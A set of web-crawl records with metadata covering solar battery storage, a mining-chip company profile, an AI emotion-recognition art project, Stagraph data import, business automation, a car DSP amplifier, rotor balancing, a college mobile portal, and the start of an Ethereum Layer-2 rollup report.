cost Solar + Storage What are the benefits of adding a solar battery to your solar power system? Whether you're thinking about installing a new solar power system, or you’ve already gone solar, energy storage can help you leverage the full potential of your solar panels. By storing the excess energy your solar panels produce, solar-plus-storage provides a reliable, low-cost power backup option so when the sun goes down, the clouds roll in, or the lights go off in your community, you always have power on hand and savings in store. There are a variety of solar battery benefits that many consider when deciding to integrate energy storage into their solar power system design: Perhaps the ultimate reason for why you might want a solar battery installation. Solar energy storage technology enables you to have more control over where your energy comes from, how it gets used, and what you can do with it. Solar and storage can provide backup power during an electrical disruption. They can keep critical facilities operating to ensure continuous essential services, like communications. Firming Solar Generation Short-term storage can be used to ride through a brief generation disruption from a passing cloud, helping maintain a “firm” electrical supply that is reliable and consistent. Reduce Demand Charge Batteries can be used to shave peak usage hours by self-consumption of solar-generated energy stored in a battery instead of importing electricity from the grid. Increase Your Savings Energy storage can help maximize the financial savings you get from solar if you don’t have access to one-to-one net metering by allowing you to draw power from the battery instead of the grid. Thus consuming more of the solar power you produce on site. 
By increasing the energy-producing potential of your solar PV system, you can reduce your fossil fuel usage even more, reducing your environmental carbon footprint, and supporting technologies that will help continue the international drive towards a better climate future. Adding a solar battery while staying connected to the grid gives you even more control over your electricity, and helps use the full capacity of your solar panels without letting any excess electricity go to waste. Are solar batteries worth the extra cost? Although pairing solar panels with energy storage is becoming more common, it doesn’t mean it’s the right choice for everyone. Installing a solar battery storage solution provides the greatest benefits to those who lives in areas that experience frequent power outages and where full-retail net metering isn’t offered. Solar batteries are also great if your main reasons for going solar are environmental, as it maximises the amount of renewable energy you use. However, if you’re only looking to save extra money, a solar battery might not be worth it for you. What we mean is, if you live in a state with full-retail net metering, you’ll be saving the same amount of money with a battery as you would without one. All the battery would be doing is adding thousands of rupees to your solar installation and providing you peace of mind in the event of a power outage. To see if you’re a good fit for storage, and if storage is right for you, read this blog. How much does storage cost? While solar is primarily a financial decision for most people, storage is typically a resilience or peace of mind purchase. However, that doesn’t mean that the cost of storage is insignificant: storage can cost nearly as much as installing solar on its own. Perhaps the biggest factor in the cost of a battery installation is the equipment itself: what battery are you installing and how many of them do you need; what chemistry does it use to store energy and the electrical work required for your installation. There are a few key factors that determine how much your energy storage system will cost: There are a few different types of batteries available for home and business owners on the market today and each material has different characteristics, with its own advantages and disadvantages. Though the most common ones typically use some form of lithium ion chemistry to store electricity. Lithium-ion solar batteries like Tesla Powerwall and LG Chem are popular for their compact design, higher Depth of Discharge rating, and extended lifespan compared to lead-acid batteries. Because of these benefits, lithium-ion batteries are typically more expensive than other solar battery types, but this initial investment can pay off over time. Also, some homeowners choose to use lead-acid batteries instead of lithium-ion batteries because they are cheaper, they tend to have a shorter lifespan, lower capacity, and require regular maintenance. The key difference: if you buy a Lithium battery, most are warrantied for 10 years, and many last even longer than that. With a Lead acid battery, you have to replace the battery bank 2-3 times over that same time frame. Capacity & Power Solar battery capacity is the amount of power a battery can store, measured in kilowatt-hours, or kWh. Solar battery capacity determines how long you can power your home with the energy stored in the battery. Solar battery power rating is what tells you how much power the battery can deliver all at once, measured in kilowatts. 
The higher the power rating, the more devices you can power at the same time. A battery with a low capacity and a high power rating can power many appliances at once, but only for a short period of time. In contrast, a battery with a high capacity and a low power rating can only power a few appliances at once, but it can do so for an extended amount of time. Power and capacity aren't an either/or comparison, and a good battery can offer both a large capacity and a high power rating, so you'll want to keep an eye on both features and find the right combination for your family's needs.
Depth of Discharge
Depth of Discharge is the maximum percentage of a battery's capacity that can safely be used without the need for a recharge. Draining a battery completely can actually damage it, so the Depth of Discharge helps you understand how much of a battery's total capacity can actually be used. For example, a battery with a 10 kWh capacity and a 90% depth of discharge rating tells you that you shouldn't use more than 9 kWh (90% of 10 kWh) before recharging, to avoid damaging the battery and shortening its lifespan. The higher the Depth of Discharge, the more of your battery you can actually use on a day-to-day basis.
When a battery stores or distributes electricity, some energy turns into heat during transmission, and some is needed to run the technology inside the battery itself, so it's not possible to draw back the same amount of energy that you feed into a solar battery. Therefore, round-trip efficiency measures the percentage of energy you can get back from a battery, compared to what the solar panels feed into it. For example, if you feed 10 kWh into your battery but can only get 8 kWh back, the battery has an 80% round-trip efficiency.
The warranty terms help you determine how long you can expect a solar battery to last. Warranty terms specify the number of cycles (one cycle = one charge and discharge) that the battery should last, as well as the capacity it should retain, before the warranty expires. As the battery's cycles increase, its ability to retain a charge decreases. For example, you might get a 10-year, 5,000-cycle, 70% capacity warranty, which means that if the battery is less than 10 years old and has had fewer than 5,000 cycles, it should have at least 70% of its original capacity remaining. The warranty that comes with a battery also affects its price. Typically, more expensive batteries include longer or better warranty terms, and that warranty can prevent you from dealing with issues down the road as your battery gets older.
Where can I get the best solar battery?
RF ENERGY has been helping thousands of home and business owners across north India access clean solar energy. Our end-to-end solutions promise results that you can track, and savings you can count on. With many years of experience designing solar power systems that include battery storage to maximise your savings, we have the knowledge needed to precisely determine which battery option will work best for you. Whether your intent is to back up your power system or reduce utility demand fees, we have a solution that will meet your needs. Getting your free estimate is the easiest way to compare solar storage options. We look forward to helping you get started on a journey towards energy independence.
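The depth-of-discharge and round-trip-efficiency examples above (9 kWh usable from a 10 kWh battery at 90% DoD, and 8 kWh returned for 10 kWh stored) reduce to two one-line formulas. The short Python sketch below only illustrates that arithmetic; the figures are the article's example numbers, not measurements of any particular product.

```python
def usable_energy(capacity_kwh: float, depth_of_discharge: float) -> float:
    """Energy you can safely draw before recharging (kWh)."""
    return capacity_kwh * depth_of_discharge

def round_trip_efficiency(energy_in_kwh: float, energy_out_kwh: float) -> float:
    """Fraction of the stored energy you actually get back."""
    return energy_out_kwh / energy_in_kwh

# Example figures from the article:
print(usable_energy(10, 0.90))        # 9.0 kWh usable on a 10 kWh battery at 90% DoD
print(round_trip_efficiency(10, 8))   # 0.8 -> an 80% round-trip efficiency
```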
systems_science
https://www.fusionsiliconminers.com/?add-to-cart=11
2020-07-05T16:17:26
s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655887377.70/warc/CC-MAIN-20200705152852-20200705182852-00434.warc.gz
0.939149
253
CC-MAIN-2020-29
webtext-fineweb__CC-MAIN-2020-29__0__255481531
en
Shenzhen Fusionsilicon Semiconductor Co., Ltd. has been focusing on the R&D and manufacturing of semiconductor products and solutions. The whole team comes from large chip design enterprises, and the core team has more than 15 years of experience in integrated circuit design along with strong algorithm and protocol analysis capabilities. The company focuses on chip design and complete-machine design, R&D and production for the digital-currency mining industry chain, and it has a rich product line of supercomputing chips. It has gathered a large number of customers around the world, including in Russia, Vietnam, Australia, the United States and India. With its strong R&D investment and scientific research strength, it has rapidly grown into an excellent encryption chip R&D enterprise in the industry. The company has a well-developed marketing system, stable supply channels and abundant product inventory, and it can respond to customer needs worldwide with efficient service support. Adhering to the service concept of "exceeding customer expectations", Panth Semiconductor has been committed to providing high-quality, high-efficiency and reliable products for global customers, becoming the world's leading encryption chip design enterprise. We will work together with many partners to promote the continuous and healthy development of the blockchain industry through technology.
systems_science
https://create.treydenc.com/e-motion
2024-02-23T00:31:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473871.23/warc/CC-MAIN-20240222225655-20240223015655-00208.warc.gz
0.956709
341
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__200289750
en
e-Motion aims to examine the way humans and non-humans read and interpret emotional expressions. The work realizes the difficulty of translation of ‘feelings’ into words. We analyse the complexity of emotion recognition by comparing human and computer vision, reducing the subject’s emotion input to facial expression seen through a digital screen. We compare the accuracy of the classification between the human and computer vision by asking the participant to detect their own recorded expressions once completed. When we see someone smiling does it necessarily mean that this person is ‘Happy’? Our need to conceptualize and translate facial expressions into language is part of a natural learning process by which we attempt to understand the world. This process is often reductive and biased. The work also examines the impact of how we are being seen by others and how this in return changes our behavioral responses. When we are told that we seem tired, angry or sad, and we don't identify as such, how does it make us feel? Technologies that we design often reflect our own world views. The AI system used in this project is trained to recognize facial expressions as one of seven human defined primary emotions. Such ocular-centric systems are built to estimate aspects of an individual’s identity or state of mind based on external appearances. This design brings to mind pseudo-scientific physiognomic practices, which are notorious for their discriminatory nature and surface up too often in AI based computer vision algorithms. The use of both AI analysis and human analysis of facial expressions reminds us that the technology is far from maturing beyond its maker, and that both humans and machines still have much to learn.Created in collaboration with Avital Meshi
systems_science
http://stagraph.com/Post?Id=26&Title=How+to+Import+Data+Into+Stagraph
2024-04-22T03:06:08
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818072.58/warc/CC-MAIN-20240422020223-20240422050223-00164.warc.gz
0.909861
466
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__51589889
en
As Stagraph runs on top of an R terminal, you can use the sample data from the environment (data_attach). You can also instantly access data that you have already prepared, through the built-in R Console. Another option offered by Stagraph is the built-in spreadsheet editor, which allows you to prepare input data directly in the program. For this purpose, the data_create function is used. The advantage of this feature is that your data is automatically stored in the project file. However, this is useful only if you want to work with a small dataset. In the case of larger datasets, it is more appropriate to keep the input data separate from the project file. If the current capabilities of the Stagraph interface do not fit your needs, you can also import data (in addition to the built-in options) through scripts written in the R language. For this purpose, the data_custom function is used. Thanks to this feature, you are not limited to the supported data sources and you can use the full power of the R language. Excel files are frequently used for storing and sharing data. The Excel spreadsheet is a relatively simple interface and is very widespread among users, so support for importing data from Excel files is integrated directly into the Stagraph interface (data_excel). Another interesting source of data in Stagraph is the spatial data from the R package named maps. You can use this package directly in the Stagraph interface (data_map, data_cities). Data from this group is often used as base layers for analyzing and visualizing other spatial data. The documentation for the data import functions is not yet complete. Still to be described are the import of data from CSV and DBF files and, finally, data import from databases via an ODBC connection. This part of the functionality will be gradually completed in future versions, mostly according to user requests. If you would like the next version to support your favorite type of data, do not hesitate to contact me. Also keep in mind that data import is not limited in Stagraph 2.0, so you can use the individual features in the Free version without limitation on the type or size of the data. If you like the article, please share it. And do not forget to try the free version.
systems_science
http://busde-tabi.com/future-proofing-operations-embracing-business-automation-for-long-term-success.htm
2024-04-20T13:02:22
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817650.14/warc/CC-MAIN-20240420122043-20240420152043-00779.warc.gz
0.913365
615
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__17733016
en
Future-proofing operations has become an imperative for businesses seeking long-term success in an increasingly dynamic and competitive environment. Embracing business automation stands out as a pivotal strategy in this pursuit, offering a myriad of benefits that extend far beyond immediate gains. At its core, automation revolutionizes the way organizations operate, enabling them to adapt, innovate, and thrive in the face of evolving challenges and opportunities. One of the key advantages of business automation lies in its ability to enhance operational efficiency. By automating repetitive tasks and workflows, companies can streamline processes, reduce manual errors, and optimize resource utilization. This efficiency not only translates into cost savings but also frees up valuable human capital to focus on strategic initiatives that drive growth and innovation. From automating routine administrative tasks to orchestrating complex production processes, automation empowers organizations to do more with less, laying a solid foundation for sustainable success in the long run. Moreover, business automation fosters agility and adaptability, essential qualities for navigating uncertain terrain. In today's fast-paced market landscape, the ability to respond swiftly to changing customer demands, market trends, and competitive pressures is paramount. Automated systems enable organizations to dynamically adjust operations, scale resources, and pivot strategies in real time, ensuring they remain agile and resilient in the face of disruption. Whether it is rapidly reconfiguring supply chains to mitigate disruptions or personalizing marketing campaigns to capitalize on emerging opportunities, automation equips businesses with the flexibility to stay ahead of the curve and seize new possibilities as they arise. Furthermore, automation serves as a catalyst for innovation and growth, fueling a culture of continuous improvement within the organization. By automating mundane tasks and workflows, employees are freed to focus on higher-value activities that require creativity, critical thinking, and strategic foresight. This unleashes a wave of innovation across the organization, driving the development of new products, services, and business models that differentiate the company in the marketplace. Whether it is leveraging AI-driven insights to unlock new customer segments or automating R&D processes to accelerate product development cycles, automation empowers businesses to innovate at scale and stay ahead of the competition. Additionally, automation enables organizations to harness the power of data-driven decision-making, unlocking actionable insights that drive strategic outcomes. By integrating analytics tools with automated systems, companies can leverage vast amounts of data to gain deep visibility into their operations, customer behavior, and market dynamics. This enables them to make informed decisions with confidence, identify emerging trends, and capitalize on untapped opportunities. From predictive analytics that forecast future demand to prescriptive analytics that optimize resource allocation, data-driven automation empowers organizations to stay ahead of the curve and make proactive decisions that drive long-term success. In conclusion, embracing business automation is essential for future-proofing operations and ensuring long-term success in an increasingly volatile and competitive landscape.
From optimizing processes to empowering employees and driving strategic insights, automation lays the groundwork for sustainable growth and differentiation, positioning businesses for success both now and in the future.
systems_science
https://sklep.basser.pl/en/amplifiers/908-helix-dsp-ultra-12-channel-amplifier.html
2022-12-08T02:42:13
s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711232.54/warc/CC-MAIN-20221208014204-20221208044204-00031.warc.gz
0.91974
706
CC-MAIN-2022-49
webtext-fineweb__CC-MAIN-2022-49__0__106611690
en
Price includes 23% VAT
The name says it all – the new HELIX DSP ULTRA is anything but another signal processor with just more channels. Rather, it is the next technological milestone that impressively demonstrates Audiotec Fischer's expertise in the field of DSP technology. Computing power can only be replaced by even more computing power – and that's why the DSP ULTRA is equipped with two of the most powerful 64-bit audio signal processors from Analog Devices. An incredible 2.4 billion MAC operations per second, in combination with the high sampling rate of 96 kHz (resulting in an audio bandwidth of over 40 kHz), make the twelve separately processed channels and the multitude of new sound features possible. Rapid processing power is not limited to the signal path – the particularly fast 32-bit ACO platform takes over all control tasks and delivers the decisive speed increase, especially for data communication with our DSP PC-Tool software, but also for lightning-fast switching between up to ten possible sound setups. But ACO offers much more – fantastic sound effects such as Augmented Bass Processing or StageXpander are implemented, as well as a channel-separated Input EQ including an Input Signal Analyzer (ISA) for easy analysis and compensation of input signals from OE radios that already include a sound setup ex works. The HELIX DSP ULTRA justifies its name not only in terms of functionality, but also with respect to sound quality. An extremely complex and newly designed analog input stage ensures phenomenal sound characteristics with full high-res audio bandwidth up to more than 40 kHz. But that's not all – tremendous effort was put into filtering out any unwanted interference in the power supply of the individual stages. In addition, only particularly low-noise operational amplifiers from TI / Burr-Brown's legendary "OPA series" are now used. The adaptation to modern OE sound systems via an increasing number of inputs has a significant impact on the complexity of the signal routing inside the processor. Especially when several input signals are mixed together and then split again into multi-way systems, conventional routing concepts quickly reach their limits, both in terms of implementation and usability. Audiotec Fischer's new, multi-stage "Virtual Channel Processing", in conjunction with the recognized user-friendly DSP PC-Tool software, makes it easy to realize even highly complex system configurations. It also allows free assignment of our proprietary FX sound features such as "RealCenter" or "StageEQ". Simple adaptation to existing factory radios or multi-channel OE sound systems is more important than ever before – and that's why the DSP ULTRA is not only equipped with the latest-generation ADEP.3 circuit, but also offers a particularly large adjustment range for the input sensitivity. The enormous range of 1 - 8 volts (RCA) or 4 - 32 volts (high-level) allows combination with almost any imaginable analog signal source, even high-power OE amplifiers. Despite its vast range of functions, the new HELIX DSP ULTRA impresses with a straightforward and timeless design that is still compact – ideal for a simple installation. The sum of its characteristics makes the HELIX DSP ULTRA the perfect "tool" for every uncompromising, audiophile music lover with the highest demands.
|Enclosure width (mm)||177|
|Enclosure height (mm)||40|
|Enclosure depth (mm)||170|
systems_science
https://www.elliott-turbo.com/high-speed-balance
2024-04-16T05:32:00
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817043.36/warc/CC-MAIN-20240416031446-20240416061446-00454.warc.gz
0.934541
296
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__99736940
en
Ebara Elliott Energy's state-of-the-art, high-speed rotor balance facility features computer-aided balancing and one of the largest balancing chambers in the world, with an underground bunker and control room. The bunker chamber operates under vacuum which allows balancing of fully bladed rotors under running conditions. During planned or unplanned maintenance, turbomachinery rotors are typically balanced at low speed before reinstallation. However, repairs to the rotor or replacement of rotor parts can cause changes to the rotor dynamics that are not detectable during low-speed balance. Undetected imbalances can excite the rotor at operating speed, causing it to vibrate excessively. High vibration can trigger an unplanned shutdown, potentially costing millions of dollars in lost production. Our high-speed balancing capabilities minimize vibration in any manufacturer's rotor throughout the entire speed range. High-speed balance also relieves residual stresses introduced during the repair process and allows the rotor components to settle into place. Following a high-speed balance at our facility, engineers and technicians review the results to ensure that any imbalances have been corrected and will not affect the future performance of the rotor. Certain circumstances dictate that a rotor should be balanced at high speed before going into service: At Ebara Elliott Energy, we know that turnaround timetables can be tight. We regularly balance rotors and ship them back to customers within 24 hours after delivery to our high-speed rotor balance facility.
systems_science
http://csceagle.com/2012/12/21/csc-launches-mobile-friendly-online-platform/
2018-02-21T07:26:04
s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891813571.24/warc/CC-MAIN-20180221063956-20180221083956-00371.warc.gz
0.937762
315
CC-MAIN-2018-09
webtext-fineweb__CC-MAIN-2018-09__0__253560582
en
CSC launches mobile-friendly platform Since yesterday’s launch of a new online platform, CSC’s students can now access a wealth of online data including class schedules, financial aid information, and more in mobile-friendly format. The platform at https://mycscmobile.nebraska.edu/, termed MyCSCMobile, allows users to access data from the Nebraska Student Information System from the convenience of their mobile devices. “NeSIS is the electronic database that contains personal records for students, parents, employees, students who have graduated since 1985 and applicants of the university’s four campuses and Nebraska’s three state colleges,” the University of Nebraska-Lincoln’s website states. “It manages nearly every aspect of the student experience, including admissions, housing and course registration.” NeSIS is housed at the University of Nebraska Computer Services Network data center. CSC’s Chief Information Officer Ann Burk said Friday that the platform was officially launched Dec. 20 and that, as it was a part of the statewide NeSIS project, the college paid less than $5,000 for its use. Chadron State is the only one of Nebraska’s three state colleges to adopt the new system, Burk said. “Wayne and Peru decided to wait.” “We’re really excited,” she said. “Students will have access to MyCSC from basically anywhere using their smart phones.”
systems_science
https://albaronventures.com/ethereum-layer-2-ecosystem/
2024-03-01T18:01:28
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475422.71/warc/CC-MAIN-20240301161412-20240301191412-00815.warc.gz
0.906704
9,404
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__16639277
en
The Ethereum rollup-centric roadmap represents the first blockchain solution that can scale for global adoption through the combination of rollups and data shards. To achieve this goal, Ethereum will transform itself into the settlement layer for rollups. This shift marks the separation between the security and execution layers, as a result, it will be possible to leverage a modular architecture to scale beyond the limits that are imposed by Layer-1 solutions. Rollups are a type of Layer-2 scaling solution that increases Ethereum’s throughput by performing transaction execution off-chain and posting transaction data on Layer-1. Due to this, rollups inherit Ethereum’s security properties and optimize for execution. Rollups can be segmented into two different types, optimistic rollups, and zk-rollups. The main difference between both rollups lies in the method in which they are verified by the underlying Layer-1. Optimistic rollups do not perform any computation by default. Instead, they post data to the Layer-1 base chain and assume that it is correct. To ensure that all transactions are legitimate, optimistic rollups rely on fraud proofs that challenge state changes and introduce high exit times that can vary between one day and a week. Alternatively, zk-rollups generate validity proofs that are posted on Layer-1 with a given batch of transactions. Unlike optimistic rollups, these cryptographic proofs can be instantly confirmed, thereby, zk-rollups aren’t liable to high exit times. Despite this clear advantage, validity proofs have high confirmation costs that impose infrequent confirmations. Due to this cost-driven delay that is introduced by increased complexity, exit times from zk-rollups are not immediate. Disregarding the tradeoffs that exist between both types of rollups (e.g. Performance versus EVM-compatibility), moving assets between rollups and the Layer-1 base chain involves high exit times and costs. For that reason, these limitations introduce new obstacles for Ethereum’s Layer-2 ecosystem, such as limited cross-rollup composability, and fragmented liquidity. As such, interoperability bridges represent crucial infrastructure when it comes to overcoming these challenges and avoiding a siloed rollup ecosystem. By enabling users to directly move assets from rollup to rollup, these bridges reduce friction and enable fast and cost-effective transactions. Therefore, it is possible to retain cross-rollup composability for the application layer and a frictionless flow of liquidity from rollup to rollup. Furthermore, it is essential to improve the liquidity that is present in these bridges in order to ensure optimal trade executions and avoid high price impacts within bridge AMMs that would ultimately undermine the flow of liquidity between rollups. For that purpose, liquidity infrastructure layers, such as Tokemak, can prove to be important components for the Layer-2 ecosystem by providing sustainable and reliable liquidity to interoperability bridges. Additionally, this approach removes the unsustainable and inflationary dependency from liquidity mining rewards. Lastly, to complete the infrastructure stack, and to ensure an optimal user experience for the rollup ecosystem, it is equally necessary to adopt cross-chain bridge aggregators that will route users through the best bridge solution. 
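As a rough illustration of the exit-time contrast described above, the toy Python sketch below models the earliest Layer-1 withdrawal under each verification model. The one-week challenge window and the hourly proof cadence are placeholder values within the ranges the text mentions, not the parameters of any particular rollup.

```python
from dataclasses import dataclass

@dataclass
class Withdrawal:
    rollup_type: str          # "optimistic" or "zk"
    batch_posted_at_hour: float

# Illustrative parameters only (not the settings of any specific network).
CHALLENGE_WINDOW_HOURS = 7 * 24   # optimistic rollups: dispute period of ~1 day to 1 week
PROOF_INTERVAL_HOURS = 1          # zk-rollups: validity proofs posted in periodic batches

def earliest_l1_exit(w: Withdrawal) -> float:
    """Hour at which funds can be claimed on Layer-1."""
    if w.rollup_type == "optimistic":
        # Funds unlock only once the fraud-proof window has passed unchallenged.
        return w.batch_posted_at_hour + CHALLENGE_WINDOW_HOURS
    # A validity proof is confirmed as soon as it lands on Layer-1, so the wait
    # is only until the next proof batch is posted and verified.
    return w.batch_posted_at_hour + PROOF_INTERVAL_HOURS

print(earliest_l1_exit(Withdrawal("optimistic", 0)))  # 168.0 hours
print(earliest_l1_exit(Withdrawal("zk", 0)))          # 1.0 hour
```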
This report addresses the present and future state of Ethereum’s Layer-2 ecosystem and it explores how rollups, interoperability bridges, and cross-chain aggregators will define the next evolutionary step of blockchain scaling powered by a sustainable liquidity layer that is based on a rollup-centric model. For optimistic Rollups, Ethereum’s security layer assumes that a given batch of transactions is valid by default; this approach leads to large scalability improvements (up to x100). That batch of transactions will only be rejected if a participant that is monitoring the rollup submits a valid claim that demonstrates that the transaction is fraudulent, this is known as “fraud-proof”. This time interval during which network participants can contest the legitimacy of the data that is included in a given batch of transactions constitutes a dispute period when anyone can submit fraud proofs. Once this period is over, the transactions processed by the rollup receive the final acceptance from the security base layer. This challenge interval introduces high exit times that create long withdrawal periods (generally one week). The underlying security assumption that is made for optimistic Rollups is that there is at least one honest network participant. This implies that if that assumption holds true and one honest network participant submits a valid fraud-proof, the rollup will process transactions correctly. In order to incentivize all network participants to process only legitimate batches of transactions, sequencers (block producers and transaction processors), and participants that submit fraud proofs, are required to bond tokens that are forfeit in the event of a lost dispute. This approach creates strong incentives that avoid spam attacks with false fraud proofs or fraudulent transactions. The advantage that optimistic rollups currently offer when compared to zk-rollups, lies in the existing EVM-compatibility. This means that optimistic rollups are ideal for general purpose applications that enable the seamless migration of applications that create easier portability of native solidity contracts. Optimism and Arbitrum Optimism and Arbitrum are both Ethereum scaling solutions based on EVM-compatible optimistic rollups. Despite the existing similarities, each solution opted for different approaches regarding implementation, deployment of protocols, ordering of transactions, and dispute resolution models. Optimism decided to follow an approach based on a permissioned contract deployment, as such, the platform partnered with the Synthetix ecosystem and Uniswap to test its network prior to its launch. Contrastingly, Arbitrum decided to provide open access for all protocols that wished to deploy on its platform. This distinct approach allowed Arbitrum to create stronger network effects when compared to Optimism through a more diverse ecosystem of applications. Table 1 contains the current ecosystem metrics for Arbitrum and Optimism. |Total Value Locked |Nº of Dapps With respect to the existing implementation, Optimism adopted Geth’s codebase with minimal changes. Alternatively, Arbitrum decided to build its own implementation, ArbOS. As a result, it is possible to conclude that Optimism prioritized stability, whereas Arbitrum optimized its implementation for Layer-2. Furthermore, Arbitrum runs a sequencer that is responsible for ordering transactions, while Optimism auctions the existing MEV to other parties for a given period of time. 
Lastly, the major difference between Optimism and Arbitrum lies in the dispute resolution model. When a challenge is submitted on Optimism, the network runs the whole transaction through the EVM, on the other hand, when a challenge is submitted on Arbitrum, the network uses an off-chain dispute resolution method that requires only a single step of the transaction. Therefore, it is possible to conclude that Optimism’s approach to dispute resolutions is simpler and faster, while Arbitrum’s approach is more complex but less expensive due to lower transaction costs on the underlying Layer-1. Currently, Optimism and Arbitrum are throttled while in beta, as the throttle is lifted, fees will decrease on both networks. It is worth noting that the lower transaction costs offered by optimistic rollups are particularly evident for transactions that require higher levels of complexity, the following table 2 depicts this relationship and provides a transaction cost comparison for both networks. As expected, transactions that are more complex have higher costs that are intrinsic to the transaction type. Additionally, it is also possible to conclude that the decrease in transaction costs that is achieved by rollups is larger for complex types of transactions (e.g. swaps versus ETH transfers). Zk-rollups bundle batches of transactions off-chain and generate cryptographic zero-knowledge proofs which are used to record the validity of the block on the Ethereum base chain. This verification method creates validity proofs that can be immediately confirmed and thereby verify the correctness of a given batch of transactions. Such an approach implies that Ethereum only accepts batches of transactions that can be cryptographically verified, in contrast with optimistic rollups where transactions are valid by default, zk-rollups assume that transactions are invalid until proven otherwise. Furthermore, zk-rollups aren’t liable to the trust assumptions that optimistic rollups are subject to (i.e. at least one honest network participant). Due to this, zk-rollups are able to provide better security than their optimistic counterparts. Ultimately, zk-rollups offer lower fees and faster transactions when compared to optimistic rollups because confirmation times are immediate and less data is included while validating a block (this can be further improved by representing an account by an index rather than an address on Layer-2). Additionally, they are also able to avoid the week-long exit times that are imposed by optimistic rollups. Despite seeming inherently superior to optimistic rollups, the lack of EVM-compatibility remains a short-term obstacle for the adoption of zk-rollups as the leading Layer-2 scaling solution. Execution layers such as zkSync 2.0 are addressing this limitation through the zkEVM engine which will provide Ethereum’s security and solidity smart contract support to zk-rollups. The zk-rollup architecture contemplates two distinct types of users that are given as follows: - Transactors – This user creates the transaction transfer and signs it with his private key before sending the transaction to the relayer and broadcasting it to the network; - Relayer – The relayer collects and verifies several transactions that are then bundled into a batch. This batch has a validity proof associated with it that is generated by the relayer. 
Finally, the relayer submits the essential transaction data, the validity proof, and the root (one for accounts, and another for balances) of the new user state to the chain’s smart contract. This service is provided in exchange for a fee that incentivizes the relayer and covers the gas that is consumed by the validity proof’s submission and the transaction data to the chain. zkSync is an EMV-compatible Layer-2 scaling solution based on zk-rollups. As such, zkSync inherits Ethereum’s security (i.e. funds are held by a smart contract on Layer-1), while computation and storage are performed off-chain. Similar to other zk-rollups, zkSync generates validity proofs (SNARK) for each state transition within a rollup block. These validity proofs are then verified by the base chain smart contract. An architecture based on zk-rollups guarantees that validators cannot corrupt state transitions (unlike optimistic rollups), and users can always retrieve their funds through the underlying Layer-1 (zkPorter is an exception where funds can be frozen). This is possible due to the existence of validity proofs that replace trust assumptions related to validators. zkSync 2.0 was designed to maximize all components of the blockchain trilemma with an added characteristic, programmability. To achieve this purpose zkSync 2.0 combines two novel elements, zkPorter, and zkEVM. zkPorter is an off-chain data availability (DA) system that maximizes the scalability that can be offered by zk-rollups. The zkEVM, on the other hand, is the engine that powers zkSync’s EVM-compatible zk-rollup. Due to the zkEVM virtual machine, zkSync is able to support solidity smart contracts. Both solutions are fully composable and interoperable with each other. zkSync 2.0 – State Architecture The transaction costs that are associated with zk-rollups are two orders of magnitude smaller than the transaction costs that exist within Ethereum. Regardless, considering that both vary linearly, it is necessary to mitigate the effect of induced demand which dictates the linear rise of transaction costs on zk-rollups when compared to the base chain. To address this issue, zkSync 2.0 developed zkPorter which enables stable transaction costs through an exponential gain in throughput that is achieved through off-chain data availability. In zkSync 2.0 the Layer-2 state is divided into two separate components, zk-rollups, and zkPorter. The main distinction between both components lies in the data availability. Zk-rollups maintain all data availability on-chain (thus stored in Ethereum’s DA layer), while zkPorter maintains all data availability off-chain. As such, each component offers distinct levels of security and costs. On a zk-rollup, the state root is held off-chain and it is represented as a Merkle tree where the leaves are zk-rollup accounts. The root hash of the Merkle tree constitutes the cryptographic commitment to the state root and it is stored on the rollup’s smart contract on Ethereum. To guarantee the required data availability, all state updates are published to the Ethereum network as calldata. Whenever a state change occurs in a given account within a block, the final state of that account is sent to Ethereum as a state update which is propagated through the entire network. This approach guarantees that users have access to that data and it is always possible to fetch funds through Ethereum where validity proofs ensure that the published data corresponds to the state transition. 
Due to this, zk-rollups provide the same security as the underlying base chain. In order to overcome the throughput bottleneck that is imposed by Ethereum's block size, zkSync developed zkPorter as an off-chain data availability solution. While zk-rollup accounts publish both the calldata and the root hash to Ethereum, zkPorter accounts only publish the root hash to the base chain. The transaction calldata associated with zkPorter accounts is published on a separate network. It is important to note that both types of accounts remain fully composable and interoperable with each other (e.g. zkPorter accounts can interact with DeFi protocols deployed on zk-rollup accounts). Figure 2 illustrates the architecture of zkSync 2.0 subtrees separated by type of account. To secure the data availability of zkPorter, zkSync designed the Guardian network. This network relies on zkSync token holders (named Guardians) that stake their tokens and store data on behalf of zkPorter users in exchange for a fee. Guardians participate in zkSync's Proof of Stake consensus and they are required to sign all blocks with a supermajority of signatures to confirm data availability for zkPorter accounts. If they fail to do so, the existing stake is slashed. As a result, zkPorter's data availability is preserved through cryptoeconomic guarantees. If a supermajority of Guardians were malicious, it would be possible to freeze the zkPorter state. By doing so, Guardians would freeze the funds associated with zkPorter accounts (due to the denial of data availability), along with their own stake. As such, there is no cryptoeconomic incentive to attack the network. Regardless, no funds would be stolen under these circumstances, and zk-rollup accounts would be unaffected by this lack of data availability within zkPorter. Table 3 contains the projected transaction costs and throughput for both rollup modes supported by zkSync (on the zk-rollup side, fees are projected at roughly 1/100th of Layer-1 fees); it is worth noting that this projection does not contemplate Ethereum's sharding upgrade, which will dramatically increase its data availability. The zkEVM is zkSync's EVM-compatible virtual machine that runs zkSync smart contracts based on SNARK logic. This virtual machine provides efficient execution of zero-knowledge proofs in a circuit and it is able to run Solidity smart contracts while maintaining their behavior. In order to create a functional virtual machine based on zero-knowledge proofs, it was necessary to develop an instruction set of the zkEVM for the circuit and execution environments. The circuit environment is responsible for proof generation (which is slow), while the execution environment is an implementation of the zkEVM in Rust that provides simple execution and allows instant settlement of transactions on zkSync. Using recursion both between blocks and within blocks, the zkEVM is able to post one single proof for N blocks, and it can also aggregate subproofs for different logical parts of the block. The zkEVM compiler is built using the LLVM framework. This compiler relies on Zinc, which is a Rust-based language for smart contracts and general-purpose zero-knowledge proof circuits, and Yul, which is a Solidity representation that can be compiled to bytecode for different backends. As a result, the zkEVM offers developers the possibility to program smart contracts 